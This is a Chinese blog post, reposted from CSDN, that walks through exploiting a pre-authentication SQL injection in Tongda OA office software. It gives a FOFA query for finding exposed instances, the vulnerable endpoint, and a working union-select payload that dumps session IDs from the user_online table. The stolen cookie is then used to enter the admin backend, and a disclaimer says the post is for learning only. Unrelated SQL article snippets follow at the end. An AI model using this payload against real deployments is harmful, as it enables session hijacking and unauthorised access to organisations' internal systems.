首页 > 数据库 >通达OA-前台SQL注入

通达OA-前台SQL注入

时间:2023-11-25 10:33:09浏览次数:34  
标签:OA 通达 cookie 前台 SQL 数据包

通达OA-前台SQL注入

1、前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

2、漏洞复现

(1) 通过FOFA搜索有漏洞的资产

FOFA语法: app=“TDXK-通达OA”

1

(2) 输入用户名和密码进行BurpSuite抓包

2

(3) 抓到的数据包发送到重发器

3

(4) 修改数据包

POST这里:/general/reportshop/utils/get_datas.php
Poayload为:USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5 where 1={`\='` 1} union (select uid,sid from user_online where 1\={`=` 1})-- '1**

4

(5) 这里要注意如果最后一行出现空行记得删除

5

6

(6) 成功获取cookie,多个cookie用分号隔开,我们随便复制一个cookie

7

(7) 回到浏览器按F12,进行替换

8

(8) url处拼接general/index.php

9

(9) 成功进入后台

10

致谢:
感谢我的好朋友晴的耐心指导

原文:
https://blog.csdn.net/weixin_48539059/article/details/134273012

标签:OA,通达,cookie,前台,SQL,数据包
From: https://www.cnblogs.com/hkmoyanke/p/17855266.html

相关文章

  • SQL Server数据库 主键自增标识列设置为默认值重新为1
    关键代码:注意:表格里原存在有的数据自增列不会变更,变更的是重新添加后的自增列......
  • MySQL语法
    MySQL介绍数据库(DataBase,简称DB):据库是存放数据的仓库,它的存储空间很大,可以存放百万条、千万条、上亿条数据。因此,开发中只要涉及到数据,就一定会用到数据库;数据库管理系统(DataBaseManageSystem,简称DBMS):数据库管理系统是一种操纵和管理数据库的大型软件,用于建立、使用和维......
  • 【Django基础】Mysql数据库连接配置
    Django支持MySQL5.7及以上版本。Django的inspectdb功能使用information_schema数据库,其中包含所有数据库架构的详细数据。Django希望数据库支持Unicode(UTF-8编码),并将执行事务和引用完整性的任务交给它。django连接MySQL数据库,需要安装第三方数据库mysqlclientpip......
  • SQL 通配符:用于模糊搜索和匹配的 SQL 关键技巧
    SQL通配符字符通配符字符用于替代字符串中的一个或多个字符。通配符字符与LIKE运算符一起使用。LIKE运算符用于在WHERE子句中搜索列中的指定模式。示例返回所有以字母'a'开头的客户:SELECT*FROMCustomersWHERECustomerNameLIKE'a%';通配符字符符号描述%表......
  • SQL 通配符:用于模糊搜索和匹配的 SQL 关键技巧
    SQL通配符字符通配符字符用于替代字符串中的一个或多个字符。通配符字符与LIKE运算符一起使用。LIKE运算符用于在WHERE子句中搜索列中的指定模式。示例返回所有以字母'a'开头的客户:SELECT*FROMCustomersWHERECustomerNameLIKE'a%';通配符字符符号描述%......
  • 18-基础SQL-函数-流程函数
    什么是函数:是指一段可以直接被另一段程序调用的程序或代码MySQL的函数主要包括:字符串函数、数值函数、日期函数、流程函数。流程函数流程函数也是很常用的一类函数,可以在SQL语句中实现条件筛选,从而提高语句的效率。IF(value,t,f)演示:当条件为true时,返回"OK",否则返回"ERROR"......
  • MySQL 按时间段统计SQL
    按2小时段统计select*from(SELECTFLOOR(HOUR(dateTimeColumn)/2)*2ashour,count(id)asnumFROMtableNamegroupbyhour)tmporderbynum 按1小时段统计select*from(SELECTHOUR(dateTimeColumn)ashour,count(id)asnumFROMtableNamegroupby......
  • SQL server配置邮件服务已报错处理
    报错处理:SQLerror'Mailnotqueued.DatabaseMailisstopped.UseSysmail_start_sptostartDatabaseMail'邮件未排队。数据库邮件已停止。使用sysmail_start_sp来启动数据库邮件。1)确认数据库邮件是否启动。执行下面sql,若显示“1”,表示已启动。sp_configure'showadvanced......
  • python mysql 文件数据入库
    概述使用python读取数据文件(本文用的csv),处理后批量插入MySQL数据库中,在此做个记录。程序importpandasaspdfromdatetimeimportdatetimeimportpymysql#GLBS_real_power_mv_no=1000001real_power_file_file_path='./GLBS__DATA.csv'#mysqlmysql_host='127.0......
  • MySQL_索引
    索引的分类按数据结构:B+树,Hash,Full-text。按物理存储:聚簇(主键),二级(辅助)。字段特性:主键,唯一,普通,前缀。字段个数:单列,联合。按数据结构-B+树索引除此之外还有:Hash,Full-text回表:要查找2个B+树才能找到数据(二级索引-得到主键值-主键索引-得到数据)。覆盖索引:在二级索引的B+树......